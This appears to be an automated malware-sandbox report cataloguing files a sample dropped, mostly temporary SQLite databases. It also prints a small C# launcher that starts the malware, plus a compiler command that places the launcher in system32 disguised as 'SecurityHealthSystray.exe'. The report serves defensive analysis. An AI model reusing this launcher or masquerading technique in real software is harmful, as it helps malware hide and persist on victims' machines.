                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0hmqjbv.xgf.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ya0ybk0z.wd3.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\a7heZ7vjtc

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\a8tfhDV6fR

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\aK4aolTbbR

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\aQzpdIgEF0

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\anrlb1ltOs

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\az3QRpytsZ

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\b2QH5CgGmU

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.0.cs

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                          Category:dropped
                                          Size (bytes):403
                                          Entropy (8bit):4.9812065051028425
                                          Encrypted:false
                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLcPWg5ZsaiFkD:JNVQIbSfhV7TiFkMSfhsWb7FkD
                                          MD5:CE4785EA0F632BFD616E7F4F06E23932
                                          SHA1:DC041377641B2382FFC870E16EECB2894B804705
                                          SHA-256:1F15C83F226E24FEB2C1C4BE52E5295BEB69A959F2C1EA9EC23A671B339D276E
                                          SHA-512:BAB0B58B3CEAECC911B01ABF70AC18F92044F727B242CBCB38BD3DAAB96F1A1B6D264750588BFFE6BB0DA7EF378D881F55D9D9346DA8A7A4814BA7F6D03CD6BD
                                          Malicious:false
                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe"); } catch { } }).Start();. }.}.

                                          C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                          Category:dropped
                                          Size (bytes):250
                                          Entropy (8bit):5.070344810085564
                                          Encrypted:false
                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fcbS9n:Hu7L//TRq79cQWfb9n
                                          MD5:4F06D69E79961CD436D561FDC4AEE20C
                                          SHA1:CC0C0DD8BCD1FDDA2D893F1997C6B4E137C4C095
                                          SHA-256:7267F5B640B4E2CCFED99D5AA7E3BFAECB359EBB4F5DC4C08E4CF504172FEE6D
                                          SHA-512:03A746F952A2C33A2C73354AE41F6BD16FA7CFA09D000314B71ED9C1D1DD9AA38BF3A814A722B49357B2E9ED10114F506B97610027BD67AA8F6264B9414EB122
                                          Malicious:true
                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.0.cs"

                                          C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.out

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                          Category:modified
                                          Size (bytes):750
                                          Entropy (8bit):5.250404550922122
                                          Encrypted:false
                                          SSDEEP:12:KJN/I/u7L//TRq79cQWfb9uKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfb9uKax5DqBVKVrdFf
                                          MD5:D4A180EE09A014D264C02BA935D4E98F
                                          SHA1:7DC9FA8584D4C4EC3D28645A2F1739A8DBA6DA16
                                          SHA-256:8822A075201F795AEDD98A9583A817BCF3C760CAF52B2844C2E531C254C1DBFB
                                          SHA-512:65FFB983E6079FB21B210D8BB52CD4B77F6D7C4010E17854C9A791BDCFC59B2E9C0D3993F3624FAA26B13684ACFCC0F1F10310C1305A5AC770F8BDB3823BF6DA
                                          Malicious:false
                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                          C:\Users\user\AppData\Local\Temp\bWHHmnc520

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\bjpI5IWm2F

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\bnfAeo81ZD

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\bxZNLGqKxR

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\c4kvzFwRKV

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\c6UtGSVToK

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\cAKdwGtWFy

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\ccuFnUOYDP

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\cfulouQZn9

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\cuY1BCDCKX

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\cy7p76slxy

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\dIFYw6Av3n

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
